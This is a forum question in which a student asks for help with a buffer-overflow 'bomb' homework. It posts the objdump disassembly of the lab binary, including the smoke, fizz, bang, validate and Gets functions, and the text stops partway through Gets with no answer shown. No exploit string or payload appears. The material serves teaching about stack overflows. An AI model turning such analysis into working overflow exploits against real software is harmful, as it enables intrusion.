dminh01
asked on
buffer overflow bomb
hi there
I have a homework in which I need to enter a string so that the buffer bomb does not exploit and need some help. Here is the disassembly code for the bomb
-bash-3.1$ objdump -d bufbomb
bufbomb: file format elf32-i386
Disassembly of section .init:
080485fc <_init>:
80485fc: 55 push %ebp
80485fd: 89 e5 mov %esp,%ebp
80485ff: 83 ec 08 sub $0x8,%esp
8048602: e8 0d 02 00 00 call 8048814 <call_gmon_start>
8048607: e8 64 02 00 00 call 8048870 <frame_dummy>
804860c: e8 ef 0d 00 00 call 8049400 <__do_global_ctors_aux>
8048611: c9 leave
8048612: c3 ret
Disassembly of section .plt:
08048614 <sprintf@plt-0x10>:
8048614: ff 35 e4 a0 04 08 pushl 0x804a0e4
804861a: ff 25 e8 a0 04 08 jmp *0x804a0e8
8048620: 00 00 add %al,(%eax)
...
08048624 <sprintf@plt>:
8048624: ff 25 ec a0 04 08 jmp *0x804a0ec
804862a: 68 00 00 00 00 push $0x0
804862f: e9 e0 ff ff ff jmp 8048614 <_init+0x18>
08048634 <srand@plt>:
8048634: ff 25 f0 a0 04 08 jmp *0x804a0f0
804863a: 68 08 00 00 00 push $0x8
804863f: e9 d0 ff ff ff jmp 8048614 <_init+0x18>
08048644 <random@plt>:
8048644: ff 25 f4 a0 04 08 jmp *0x804a0f4
804864a: 68 10 00 00 00 push $0x10
804864f: e9 c0 ff ff ff jmp 8048614 <_init+0x18>
08048654 <signal@plt>:
8048654: ff 25 f8 a0 04 08 jmp *0x804a0f8
804865a: 68 18 00 00 00 push $0x18
804865f: e9 b0 ff ff ff jmp 8048614 <_init+0x18>
08048664 <__gmon_start__@plt>:
8048664: ff 25 fc a0 04 08 jmp *0x804a0fc
804866a: 68 20 00 00 00 push $0x20
804866f: e9 a0 ff ff ff jmp 8048614 <_init+0x18>
08048674 <calloc@plt>:
8048674: ff 25 00 a1 04 08 jmp *0x804a100
804867a: 68 28 00 00 00 push $0x28
804867f: e9 90 ff ff ff jmp 8048614 <_init+0x18>
08048684 <system@plt>:
8048684: ff 25 04 a1 04 08 jmp *0x804a104
804868a: 68 30 00 00 00 push $0x30
804868f: e9 80 ff ff ff jmp 8048614 <_init+0x18>
08048694 <memset@plt>:
8048694: ff 25 08 a1 04 08 jmp *0x804a108
804869a: 68 38 00 00 00 push $0x38
804869f: e9 70 ff ff ff jmp 8048614 <_init+0x18>
080486a4 <__libc_start_main@plt>:
80486a4: ff 25 0c a1 04 08 jmp *0x804a10c
80486aa: 68 40 00 00 00 push $0x40
80486af: e9 60 ff ff ff jmp 8048614 <_init+0x18>
080486b4 <_IO_getc@plt>:
80486b4: ff 25 10 a1 04 08 jmp *0x804a110
80486ba: 68 48 00 00 00 push $0x48
80486bf: e9 50 ff ff ff jmp 8048614 <_init+0x18>
080486c4 <__ctype_b_loc@plt>:
80486c4: ff 25 14 a1 04 08 jmp *0x804a114
80486ca: 68 50 00 00 00 push $0x50
80486cf: e9 40 ff ff ff jmp 8048614 <_init+0x18>
080486d4 <fclose@plt>:
80486d4: ff 25 18 a1 04 08 jmp *0x804a118
80486da: 68 58 00 00 00 push $0x58
80486df: e9 30 ff ff ff jmp 8048614 <_init+0x18>
080486e4 <getopt@plt>:
80486e4: ff 25 1c a1 04 08 jmp *0x804a11c
80486ea: 68 60 00 00 00 push $0x60
80486ef: e9 20 ff ff ff jmp 8048614 <_init+0x18>
080486f4 <fopen@plt>:
80486f4: ff 25 20 a1 04 08 jmp *0x804a120
80486fa: 68 68 00 00 00 push $0x68
80486ff: e9 10 ff ff ff jmp 8048614 <_init+0x18>
08048704 <alarm@plt>:
8048704: ff 25 24 a1 04 08 jmp *0x804a124
804870a: 68 70 00 00 00 push $0x70
804870f: e9 00 ff ff ff jmp 8048614 <_init+0x18>
08048714 <strcpy@plt>:
8048714: ff 25 28 a1 04 08 jmp *0x804a128
804871a: 68 78 00 00 00 push $0x78
804871f: e9 f0 fe ff ff jmp 8048614 <_init+0x18>
08048724 <printf@plt>:
8048724: ff 25 2c a1 04 08 jmp *0x804a12c
804872a: 68 80 00 00 00 push $0x80
804872f: e9 e0 fe ff ff jmp 8048614 <_init+0x18>
08048734 <srandom@plt>:
8048734: ff 25 30 a1 04 08 jmp *0x804a130
804873a: 68 88 00 00 00 push $0x88
804873f: e9 d0 fe ff ff jmp 8048614 <_init+0x18>
08048744 <fwrite@plt>:
8048744: ff 25 34 a1 04 08 jmp *0x804a134
804874a: 68 90 00 00 00 push $0x90
804874f: e9 c0 fe ff ff jmp 8048614 <_init+0x18>
08048754 <fprintf@plt>:
8048754: ff 25 38 a1 04 08 jmp *0x804a138
804875a: 68 98 00 00 00 push $0x98
804875f: e9 b0 fe ff ff jmp 8048614 <_init+0x18>
08048764 <remove@plt>:
8048764: ff 25 3c a1 04 08 jmp *0x804a13c
804876a: 68 a0 00 00 00 push $0xa0
804876f: e9 a0 fe ff ff jmp 8048614 <_init+0x18>
08048774 <cuserid@plt>:
8048774: ff 25 40 a1 04 08 jmp *0x804a140
804877a: 68 a8 00 00 00 push $0xa8
804877f: e9 90 fe ff ff jmp 8048614 <_init+0x18>
08048784 <fputc@plt>:
8048784: ff 25 44 a1 04 08 jmp *0x804a144
804878a: 68 b0 00 00 00 push $0xb0
804878f: e9 80 fe ff ff jmp 8048614 <_init+0x18>
08048794 <puts@plt>:
8048794: ff 25 48 a1 04 08 jmp *0x804a148
804879a: 68 b8 00 00 00 push $0xb8
804879f: e9 70 fe ff ff jmp 8048614 <_init+0x18>
080487a4 <rand@plt>:
80487a4: ff 25 4c a1 04 08 jmp *0x804a14c
80487aa: 68 c0 00 00 00 push $0xc0
80487af: e9 60 fe ff ff jmp 8048614 <_init+0x18>
080487b4 <tempnam@plt>:
80487b4: ff 25 50 a1 04 08 jmp *0x804a150
80487ba: 68 c8 00 00 00 push $0xc8
80487bf: e9 50 fe ff ff jmp 8048614 <_init+0x18>
080487c4 <__strdup@plt>:
80487c4: ff 25 54 a1 04 08 jmp *0x804a154
80487ca: 68 d0 00 00 00 push $0xd0
80487cf: e9 40 fe ff ff jmp 8048614 <_init+0x18>
080487d4 <exit@plt>:
80487d4: ff 25 58 a1 04 08 jmp *0x804a158
80487da: 68 d8 00 00 00 push $0xd8
80487df: e9 30 fe ff ff jmp 8048614 <_init+0x18>
Disassembly of section .text:
080487f0 <_start>:
80487f0: 31 ed xor %ebp,%ebp
80487f2: 5e pop %esi
80487f3: 89 e1 mov %esp,%ecx
80487f5: 83 e4 f0 and $0xfffffff0,%esp
80487f8: 50 push %eax
80487f9: 54 push %esp
80487fa: 52 push %edx
80487fb: 68 80 93 04 08 push $0x8049380
8048800: 68 90 93 04 08 push $0x8049390
8048805: 51 push %ecx
8048806: 56 push %esi
8048807: 68 40 90 04 08 push $0x8049040
804880c: e8 93 fe ff ff call 80486a4 <__libc_start_main@plt>
8048811: f4 hlt
8048812: 90 nop
8048813: 90 nop
08048814 <call_gmon_start>:
8048814: 55 push %ebp
8048815: 89 e5 mov %esp,%ebp
8048817: 53 push %ebx
8048818: 83 ec 04 sub $0x4,%esp
804881b: e8 00 00 00 00 call 8048820 <call_gmon_start+0xc>
8048820: 5b pop %ebx
8048821: 81 c3 c0 18 00 00 add $0x18c0,%ebx
8048827: 8b 93 fc ff ff ff mov 0xfffffffc(%ebx),%edx
804882d: 85 d2 test %edx,%edx
804882f: 74 05 je 8048836 <call_gmon_start+0x22>
8048831: e8 2e fe ff ff call 8048664 <__gmon_start__@plt>
8048836: 58 pop %eax
8048837: 5b pop %ebx
8048838: c9 leave
8048839: c3 ret
804883a: 90 nop
804883b: 90 nop
804883c: 90 nop
804883d: 90 nop
804883e: 90 nop
804883f: 90 nop
08048840 <__do_global_dtors_aux>:
8048840: 55 push %ebp
8048841: 89 e5 mov %esp,%ebp
8048843: 83 ec 08 sub $0x8,%esp
8048846: 80 3d 88 a1 04 08 00 cmpb $0x0,0x804a188
804884d: 74 0c je 804885b <__do_global_dtors_aux+0x1
804884f: eb 1c jmp 804886d <__do_global_dtors_aux+0x2
8048851: 83 c0 04 add $0x4,%eax
8048854: a3 60 a1 04 08 mov %eax,0x804a160
8048859: ff d2 call *%edx
804885b: a1 60 a1 04 08 mov 0x804a160,%eax
8048860: 8b 10 mov (%eax),%edx
8048862: 85 d2 test %edx,%edx
8048864: 75 eb jne 8048851 <__do_global_dtors_aux+0x1
8048866: c6 05 88 a1 04 08 01 movb $0x1,0x804a188
804886d: c9 leave
804886e: c3 ret
804886f: 90 nop
08048870 <frame_dummy>:
8048870: 55 push %ebp
8048871: 89 e5 mov %esp,%ebp
8048873: 83 ec 08 sub $0x8,%esp
8048876: a1 10 a0 04 08 mov 0x804a010,%eax
804887b: 85 c0 test %eax,%eax
804887d: 74 12 je 8048891 <frame_dummy+0x21>
804887f: b8 00 00 00 00 mov $0x0,%eax
8048884: 85 c0 test %eax,%eax
8048886: 74 09 je 8048891 <frame_dummy+0x21>
8048888: c7 04 24 10 a0 04 08 movl $0x804a010,(%esp)
804888f: ff d0 call *%eax
8048891: c9 leave
8048892: c3 ret
8048893: 90 nop
8048894: 90 nop
8048895: 90 nop
8048896: 90 nop
8048897: 90 nop
8048898: 90 nop
8048899: 90 nop
804889a: 90 nop
804889b: 90 nop
804889c: 90 nop
804889d: 90 nop
804889e: 90 nop
804889f: 90 nop
080488a0 <save_char>:
80488a0: 8b 0d c4 a1 04 08 mov 0x804a1c4,%ecx
80488a6: 55 push %ebp
80488a7: 89 e5 mov %esp,%ebp
80488a9: 53 push %ebx
80488aa: 89 c3 mov %eax,%ebx
80488ac: 81 f9 ff 03 00 00 cmp $0x3ff,%ecx
80488b2: 7f 37 jg 80488eb <save_char+0x4b>
80488b4: c0 f8 04 sar $0x4,%al
80488b7: 83 e0 0f and $0xf,%eax
80488ba: 0f b6 80 e4 99 04 08 movzbl 0x80499e4(%eax),%eax
80488c1: 8d 14 49 lea (%ecx,%ecx,2),%edx
80488c4: c6 82 e2 a1 04 08 20 movb $0x20,0x804a1e2(%edx)
80488cb: 88 82 e0 a1 04 08 mov %al,0x804a1e0(%edx)
80488d1: 89 d8 mov %ebx,%eax
80488d3: 83 e0 0f and $0xf,%eax
80488d6: 0f b6 80 e4 99 04 08 movzbl 0x80499e4(%eax),%eax
80488dd: 88 82 e1 a1 04 08 mov %al,0x804a1e1(%edx)
80488e3: 8d 41 01 lea 0x1(%ecx),%eax
80488e6: a3 c4 a1 04 08 mov %eax,0x804a1c4
80488eb: 5b pop %ebx
80488ec: 5d pop %ebp
80488ed: c3 ret
80488ee: 66 90 xchg %ax,%ax
080488f0 <entry_check>:
80488f0: 55 push %ebp
80488f1: 89 e5 mov %esp,%ebp
80488f3: 8b 45 08 mov 0x8(%ebp),%eax
80488f6: 5d pop %ebp
80488f7: a3 64 a1 04 08 mov %eax,0x804a164
80488fc: c3 ret
80488fd: 8d 76 00 lea 0x0(%esi),%esi
08048900 <illegalhandler>:
8048900: 55 push %ebp
8048901: 89 e5 mov %esp,%ebp
8048903: 83 ec 08 sub $0x8,%esp
8048906: c7 04 24 50 94 04 08 movl $0x8049450,(%esp)
804890d: e8 82 fe ff ff call 8048794 <puts@plt>
8048912: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
8048919: e8 76 fe ff ff call 8048794 <puts@plt>
804891e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048925: e8 aa fe ff ff call 80487d4 <exit@plt>
804892a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
08048930 <alarmhandler>:
8048930: 55 push %ebp
8048931: 89 e5 mov %esp,%ebp
8048933: 83 ec 08 sub $0x8,%esp
8048936: a1 68 a1 04 08 mov 0x804a168,%eax
804893b: c7 04 24 7c 94 04 08 movl $0x804947c,(%esp)
8048942: 89 44 24 04 mov %eax,0x4(%esp)
8048946: e8 d9 fd ff ff call 8048724 <printf@plt>
804894b: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
8048952: e8 3d fe ff ff call 8048794 <puts@plt>
8048957: c7 04 24 00 00 00 00 movl $0x0,(%esp)
804895e: e8 71 fe ff ff call 80487d4 <exit@plt>
8048963: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048969: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08048970 <seghandler>:
8048970: 55 push %ebp
8048971: 89 e5 mov %esp,%ebp
8048973: 83 ec 08 sub $0x8,%esp
8048976: c7 04 24 b0 94 04 08 movl $0x80494b0,(%esp)
804897d: e8 12 fe ff ff call 8048794 <puts@plt>
8048982: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
8048989: e8 06 fe ff ff call 8048794 <puts@plt>
804898e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048995: e8 3a fe ff ff call 80487d4 <exit@plt>
804899a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080489a0 <bushandler>:
80489a0: 55 push %ebp
80489a1: 89 e5 mov %esp,%ebp
80489a3: 83 ec 08 sub $0x8,%esp
80489a6: c7 04 24 d8 94 04 08 movl $0x80494d8,(%esp)
80489ad: e8 e2 fd ff ff call 8048794 <puts@plt>
80489b2: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
80489b9: e8 d6 fd ff ff call 8048794 <puts@plt>
80489be: c7 04 24 00 00 00 00 movl $0x0,(%esp)
80489c5: e8 0a fe ff ff call 80487d4 <exit@plt>
80489ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
080489d0 <usage>:
80489d0: 55 push %ebp
80489d1: 89 e5 mov %esp,%ebp
80489d3: 83 ec 08 sub $0x8,%esp
80489d6: 89 44 24 04 mov %eax,0x4(%esp)
80489da: c7 04 24 f8 94 04 08 movl $0x80494f8,(%esp)
80489e1: e8 3e fd ff ff call 8048724 <printf@plt>
80489e6: c7 04 24 da 97 04 08 movl $0x80497da,(%esp)
80489ed: e8 a2 fd ff ff call 8048794 <puts@plt>
80489f2: c7 04 24 f8 97 04 08 movl $0x80497f8,(%esp)
80489f9: e8 96 fd ff ff call 8048794 <puts@plt>
80489fe: c7 04 24 1c 95 04 08 movl $0x804951c,(%esp)
8048a05: e8 8a fd ff ff call 8048794 <puts@plt>
8048a0a: c7 04 24 44 95 04 08 movl $0x8049544,(%esp)
8048a11: e8 7e fd ff ff call 8048794 <puts@plt>
8048a16: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048a1d: e8 b2 fd ff ff call 80487d4 <exit@plt>
8048a22: 8d b4 26 00 00 00 00 lea 0x0(%esi),%esi
8048a29: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08048a30 <validate>:
8048a30: 55 push %ebp
8048a31: 89 e5 mov %esp,%ebp
8048a33: 81 ec 48 01 00 00 sub $0x148,%esp
8048a39: 8b 0d b4 a1 04 08 mov 0x804a1b4,%ecx
8048a3f: 89 5d f4 mov %ebx,0xfffffff4(%ebp)
8048a42: 8b 5d 08 mov 0x8(%ebp),%ebx
8048a45: 89 75 f8 mov %esi,0xfffffff8(%ebp)
8048a48: 89 7d fc mov %edi,0xfffffffc(%ebp)
8048a4b: 85 c9 test %ecx,%ecx
8048a4d: 0f 84 d8 01 00 00 je 8048c2b <validate+0x1fb>
8048a53: 83 fb 04 cmp $0x4,%ebx
8048a56: 77 58 ja 8048ab0 <validate+0x80>
8048a58: 3b 1d 64 a1 04 08 cmp 0x804a164,%ebx
8048a5e: 74 20 je 8048a80 <validate+0x50>
8048a60: c7 04 24 bc 95 04 08 movl $0x80495bc,(%esp)
8048a67: e8 28 fd ff ff call 8048794 <puts@plt>
8048a6c: 8d 74 26 00 lea 0x0(%esi),%esi
8048a70: 8b 5d f4 mov 0xfffffff4(%ebp),%ebx
8048a73: 8b 75 f8 mov 0xfffffff8(%ebp),%esi
8048a76: 8b 7d fc mov 0xfffffffc(%ebp),%edi
8048a79: 89 ec mov %ebp,%esp
8048a7b: 5d pop %ebp
8048a7c: c3 ret
8048a7d: 8d 76 00 lea 0x0(%esi),%esi
8048a80: 8b 04 9d 6c a1 04 08 mov 0x804a16c(,%ebx,4),%eax
8048a87: c7 05 bc a1 04 08 01 movl $0x1,0x804a1bc
8048a8e: 00 00 00
8048a91: 83 e8 01 sub $0x1,%eax
8048a94: 85 c0 test %eax,%eax
8048a96: 89 04 9d 6c a1 04 08 mov %eax,0x804a16c(,%ebx,4)
8048a9d: 7e 21 jle 8048ac0 <validate+0x90>
8048a9f: c7 04 24 0f 98 04 08 movl $0x804980f,(%esp)
8048aa6: e8 e9 fc ff ff call 8048794 <puts@plt>
8048aab: eb c3 jmp 8048a70 <validate+0x40>
8048aad: 8d 76 00 lea 0x0(%esi),%esi
8048ab0: c7 04 24 94 95 04 08 movl $0x8049594,(%esp)
8048ab7: e8 d8 fc ff ff call 8048794 <puts@plt>
8048abc: eb b2 jmp 8048a70 <validate+0x40>
8048abe: 66 90 xchg %ax,%ax
8048ac0: 8b 15 b8 a1 04 08 mov 0x804a1b8,%edx
8048ac6: 85 d2 test %edx,%edx
8048ac8: 0f 85 7f 01 00 00 jne 8048c4d <validate+0x21d>
8048ace: a1 a4 a1 04 08 mov 0x804a1a4,%eax
8048ad3: 85 c0 test %eax,%eax
8048ad5: 0f 84 61 01 00 00 je 8048c3c <validate+0x20c>
8048adb: c7 44 24 04 20 98 04 movl $0x8049820,0x4(%esp)
8048ae2: 08
8048ae3: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048aea: e8 c5 fc ff ff call 80487b4 <tempnam@plt>
8048aef: c7 44 24 04 27 98 04 movl $0x8049827,0x4(%esp)
8048af6: 08
8048af7: 89 85 e0 fe ff ff mov %eax,0xfffffee0(%ebp)
8048afd: 89 04 24 mov %eax,(%esp)
8048b00: e8 ef fb ff ff call 80486f4 <fopen@plt>
8048b05: 85 c0 test %eax,%eax
8048b07: 89 c6 mov %eax,%esi
8048b09: 0f 84 76 01 00 00 je 8048c85 <validate+0x255>
8048b0f: 89 44 24 0c mov %eax,0xc(%esp)
8048b13: c7 44 24 08 1b 00 00 movl $0x1b,0x8(%esp)
8048b1a: 00
8048b1b: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048b22: 00
8048b23: c7 04 24 29 98 04 08 movl $0x8049829,(%esp)
8048b2a: e8 15 fc ff ff call 8048744 <fwrite@plt>
8048b2f: 89 74 24 04 mov %esi,0x4(%esp)
8048b33: c7 04 24 0a 00 00 00 movl $0xa,(%esp)
8048b3a: e8 45 fc ff ff call 8048784 <fputc@plt>
8048b3f: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048b46: e8 29 fc ff ff call 8048774 <cuserid@plt>
8048b4b: 85 c0 test %eax,%eax
8048b4d: 0f 84 19 01 00 00 je 8048c6c <validate+0x23c>
8048b53: 8d 7d eb lea 0xffffffeb(%ebp),%edi
8048b56: 89 44 24 04 mov %eax,0x4(%esp)
8048b5a: 89 3c 24 mov %edi,(%esp)
8048b5d: e8 b2 fb ff ff call 8048714 <strcpy@plt>
8048b62: 89 7c 24 08 mov %edi,0x8(%esp)
8048b66: c7 44 24 04 45 98 04 movl $0x8049845,0x4(%esp)
8048b6d: 08
8048b6e: 89 34 24 mov %esi,(%esp)
8048b71: e8 de fb ff ff call 8048754 <fprintf@plt>
8048b76: a1 b0 a1 04 08 mov 0x804a1b0,%eax
8048b7b: 89 5c 24 10 mov %ebx,0x10(%esp)
8048b7f: 8d 9d eb fe ff ff lea 0xfffffeeb(%ebp),%ebx
8048b85: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp)
8048b8c: 00
8048b8d: c7 44 24 18 e0 a1 04 movl $0x804a1e0,0x18(%esp)
8048b94: 08
8048b95: 89 44 24 14 mov %eax,0x14(%esp)
8048b99: a1 b4 a1 04 08 mov 0x804a1b4,%eax
8048b9e: c7 44 24 08 6f 3b 00 movl $0x3b6f,0x8(%esp)
8048ba5: 00
8048ba6: c7 44 24 04 2c 96 04 movl $0x804962c,0x4(%esp)
8048bad: 08
8048bae: 89 34 24 mov %esi,(%esp)
8048bb1: 89 44 24 0c mov %eax,0xc(%esp)
8048bb5: e8 9a fb ff ff call 8048754 <fprintf@plt>
8048bba: 89 34 24 mov %esi,(%esp)
8048bbd: e8 12 fb ff ff call 80486d4 <fclose@plt>
8048bc2: 8b 85 e0 fe ff ff mov 0xfffffee0(%ebp),%eax
8048bc8: c7 44 24 14 53 98 04 movl $0x8049853,0x14(%esp)
8048bcf: 08
8048bd0: c7 44 24 10 5d 98 04 movl $0x804985d,0x10(%esp)
8048bd7: 08
8048bd8: c7 44 24 0c 63 98 04 movl $0x8049863,0xc(%esp)
8048bdf: 08
8048be0: 89 44 24 08 mov %eax,0x8(%esp)
8048be4: c7 44 24 04 7a 98 04 movl $0x804987a,0x4(%esp)
8048beb: 08
8048bec: 89 1c 24 mov %ebx,(%esp)
8048bef: e8 30 fa ff ff call 8048624 <sprintf@plt>
8048bf4: 89 1c 24 mov %ebx,(%esp)
8048bf7: e8 88 fa ff ff call 8048684 <system@plt>
8048bfc: 85 c0 test %eax,%eax
8048bfe: 75 5e jne 8048c5e <validate+0x22e>
8048c00: c7 04 24 8d 98 04 08 movl $0x804988d,(%esp)
8048c07: e8 88 fb ff ff call 8048794 <puts@plt>
8048c0c: c7 04 24 4c 96 04 08 movl $0x804964c,(%esp)
8048c13: e8 7c fb ff ff call 8048794 <puts@plt>
8048c18: 8b 85 e0 fe ff ff mov 0xfffffee0(%ebp),%eax
8048c1e: 89 04 24 mov %eax,(%esp)
8048c21: e8 3e fb ff ff call 8048764 <remove@plt>
8048c26: e9 45 fe ff ff jmp 8048a70 <validate+0x40>
8048c2b: c7 04 24 68 95 04 08 movl $0x8049568,(%esp)
8048c32: e8 5d fb ff ff call 8048794 <puts@plt>
8048c37: e9 34 fe ff ff jmp 8048a70 <validate+0x40>
8048c3c: c7 04 24 bc 96 04 08 movl $0x80496bc,(%esp)
8048c43: e8 4c fb ff ff call 8048794 <puts@plt>
8048c48: e9 23 fe ff ff jmp 8048a70 <validate+0x40>
8048c4d: c7 04 24 1a 98 04 08 movl $0x804981a,(%esp)
8048c54: e8 3b fb ff ff call 8048794 <puts@plt>
8048c59: e9 12 fe ff ff jmp 8048a70 <validate+0x40>
8048c5e: c7 04 24 7c 96 04 08 movl $0x804967c,(%esp)
8048c65: e8 2a fb ff ff call 8048794 <puts@plt>
8048c6a: eb ac jmp 8048c18 <validate+0x1e8>
8048c6c: 8d 7d eb lea 0xffffffeb(%ebp),%edi
8048c6f: c7 45 eb 6e 6f 62 6f movl $0x6f626f6e,0xffffffeb(%eb
8048c76: 66 c7 45 ef 64 79 movw $0x7964,0xffffffef(%ebp)
8048c7c: c6 45 f1 00 movb $0x0,0xfffffff1(%ebp)
8048c80: e9 dd fe ff ff jmp 8048b62 <validate+0x132>
8048c85: c7 04 24 f8 95 04 08 movl $0x80495f8,(%esp)
8048c8c: e8 93 fa ff ff call 8048724 <printf@plt>
8048c91: c7 04 24 01 00 00 00 movl $0x1,(%esp)
8048c98: e8 37 fb ff ff call 80487d4 <exit@plt>
8048c9d: 8d 76 00 lea 0x0(%esi),%esi
08048ca0 <bang>:
8048ca0: 55 push %ebp
8048ca1: 89 e5 mov %esp,%ebp
8048ca3: 83 ec 08 sub $0x8,%esp
8048ca6: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8048cad: e8 3e fc ff ff call 80488f0 <entry_check>
8048cb2: a1 c0 a1 04 08 mov 0x804a1c0,%eax
8048cb7: 3b 05 b0 a1 04 08 cmp 0x804a1b0,%eax
8048cbd: 74 21 je 8048ce0 <bang+0x40>
8048cbf: 89 44 24 04 mov %eax,0x4(%esp)
8048cc3: c7 04 24 97 98 04 08 movl $0x8049897,(%esp)
8048cca: e8 55 fa ff ff call 8048724 <printf@plt>
8048ccf: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048cd6: e8 f9 fa ff ff call 80487d4 <exit@plt>
8048cdb: 90 nop
8048cdc: 8d 74 26 00 lea 0x0(%esi),%esi
8048ce0: 89 44 24 04 mov %eax,0x4(%esp)
8048ce4: c7 04 24 08 97 04 08 movl $0x8049708,(%esp)
8048ceb: e8 34 fa ff ff call 8048724 <printf@plt>
8048cf0: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8048cf7: e8 34 fd ff ff call 8048a30 <validate>
8048cfc: eb d1 jmp 8048ccf <bang+0x2f>
8048cfe: 66 90 xchg %ax,%ax
08048d00 <fizz>:
8048d00: 55 push %ebp
8048d01: 89 e5 mov %esp,%ebp
8048d03: 53 push %ebx
8048d04: 83 ec 14 sub $0x14,%esp
8048d07: 8b 5d 08 mov 0x8(%ebp),%ebx
8048d0a: c7 04 24 01 00 00 00 movl $0x1,(%esp)
8048d11: e8 da fb ff ff call 80488f0 <entry_check>
8048d16: 3b 1d b0 a1 04 08 cmp 0x804a1b0,%ebx
8048d1c: 74 22 je 8048d40 <fizz+0x40>
8048d1e: 89 5c 24 04 mov %ebx,0x4(%esp)
8048d22: c7 04 24 30 97 04 08 movl $0x8049730,(%esp)
8048d29: e8 f6 f9 ff ff call 8048724 <printf@plt>
8048d2e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d35: e8 9a fa ff ff call 80487d4 <exit@plt>
8048d3a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048d40: 89 5c 24 04 mov %ebx,0x4(%esp)
8048d44: c7 04 24 b5 98 04 08 movl $0x80498b5,(%esp)
8048d4b: e8 d4 f9 ff ff call 8048724 <printf@plt>
8048d50: c7 04 24 01 00 00 00 movl $0x1,(%esp)
8048d57: e8 d4 fc ff ff call 8048a30 <validate>
8048d5c: eb d0 jmp 8048d2e <fizz+0x2e>
8048d5e: 66 90 xchg %ax,%ax
08048d60 <smoke>:
8048d60: 55 push %ebp
8048d61: 89 e5 mov %esp,%ebp
8048d63: 83 ec 08 sub $0x8,%esp
8048d66: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d6d: e8 7e fb ff ff call 80488f0 <entry_check>
8048d72: c7 04 24 d3 98 04 08 movl $0x80498d3,(%esp)
8048d79: e8 16 fa ff ff call 8048794 <puts@plt>
8048d7e: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d85: e8 a6 fc ff ff call 8048a30 <validate>
8048d8a: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048d91: e8 3e fa ff ff call 80487d4 <exit@plt>
8048d96: 8d 76 00 lea 0x0(%esi),%esi
8048d99: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08048da0 <Gets>:
8048da0: 55 push %ebp
8048da1: 89 e5 mov %esp,%ebp
8048da3: 57 push %edi
8048da4: 56 push %esi
8048da5: 53 push %ebx
8048da6: 83 ec 0c sub $0xc,%esp
8048da9: 8b 1d ac a1 04 08 mov 0x804a1ac,%ebx
8048daf: c7 05 c4 a1 04 08 00 movl $0x0,0x804a1c4
8048db6: 00 00 00
8048db9: 8b 75 08 mov 0x8(%ebp),%esi
8048dbc: 85 db test %ebx,%ebx
8048dbe: 74 72 je 8048e32 <Gets+0x92>
8048dc0: bf 01 00 00 00 mov $0x1,%edi
8048dc5: c7 45 f0 00 00 00 00 movl $0x0,0xfffffff0(%ebp)
8048dcc: 8d 74 26 00 lea 0x0(%esi),%esi
8048dd0: a1 a0 a1 04 08 mov 0x804a1a0,%eax
8048dd5: 89 04 24 mov %eax,(%esp)
8048dd8: e8 d7 f8 ff ff call 80486b4 <_IO_getc@plt>
8048ddd: 83 f8 ff cmp $0xffffffff,%eax
8048de0: 89 c3 mov %eax,%ebx
8048de2: 74 60 je 8048e44 <Gets+0xa4>
8048de4: 83 f8 0a cmp $0xa,%eax
8048de7: 74 5b je 8048e44 <Gets+0xa4>
8048de9: e8 d6 f8 ff ff call 80486c4 <__ctype_b_loc@plt>
8048dee: 8b 00 mov (%eax),%eax
8048df0: f6 44 58 01 10 testb $0x10,0x1(%eax,%ebx,2)
8048df5: 74 d9 je 8048dd0 <Gets+0x30>
8048df7: 8d 43 d0 lea 0xffffffd0(%ebx),%eax
8048dfa: 83 f8 09 cmp $0x9,%eax
8048dfd: 89 c2 mov %eax,%edx
8048dff: 76 0f jbe 8048e10 <Gets+0x70>
8048e01: 8d 43 bf lea 0xffffffbf(%ebx),%eax
8048e04: 83 f8 05 cmp $0x5,%eax
8048e07: 8d 53 c9 lea 0xffffffc9(%ebx),%edx
8048e0a: 76 04 jbe 8048e10 <Gets+0x70>
8048e0c: 8d 53 a9 lea 0xffffffa9(%ebx),%edx
8048e0f: 90 nop
8048e10: 85 ff test %edi,%edi
8048e12: 74 4c je 8048e60 <Gets+0xc0>
8048e14: 31 ff xor %edi,%edi
8048e16: 89 55 f0 mov %edx,0xfffffff0(%ebp)
8048e19: eb b5 jmp 8048dd0 <Gets+0x30>
8048e1b: 90 nop
8048e1c: 8d 74 26 00 lea 0x0(%esi),%esi
8048e20: 83 f8 0a cmp $0xa,%eax
8048e23: 74 1f je 8048e44 <Gets+0xa4>
8048e25: 88 06 mov %al,(%esi)
8048e27: 0f be c0 movsbl %al,%eax
8048e2a: 83 c6 01 add $0x1,%esi
8048e2d: e8 6e fa ff ff call 80488a0 <save_char>
8048e32: a1 a0 a1 04 08 mov 0x804a1a0,%eax
8048e37: 89 04 24 mov %eax,(%esp)
8048e3a: e8 75 f8 ff ff call 80486b4 <_IO_getc@plt>
8048e3f: 83 f8 ff cmp $0xffffffff,%eax
8048e42: 75 dc jne 8048e20 <Gets+0x80>
8048e44: c6 06 00 movb $0x0,(%esi)
8048e47: a1 c4 a1 04 08 mov 0x804a1c4,%eax
8048e4c: c6 84 40 e0 a1 04 08 movb $0x0,0x804a1e0(%eax,%eax,2
8048e53: 00
8048e54: 8b 45 08 mov 0x8(%ebp),%eax
